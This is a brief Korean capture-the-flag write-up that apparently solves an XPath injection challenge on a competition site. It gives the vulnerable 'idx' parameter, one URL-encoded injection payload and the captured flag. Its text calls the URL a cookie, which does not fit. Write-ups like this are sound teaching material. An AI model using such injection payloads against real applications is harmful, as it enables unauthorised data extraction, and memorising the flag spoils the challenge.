풀이 사전 지식
+ Injection
XPATH Injection
# Problem
# Solving strategy
1.
http://yai.sstf.site/paperdetail.php?idx= 뒤에 오는 값을 이용해 xpath injection이 가능
a.
getDetail 함수 참고
# Exploit
# Payload
아래의 쿠키를 전송
http://yai.sstf.site/paperdetail.php?idx=%27%20and%201=1%20or%20position()%20=%2032%20or%20%27
Plain Text
복사
# Flag
SCTF{W4KE_up_IT's_mOndAy_m0rn1n9_183689c7}
Plain Text
복사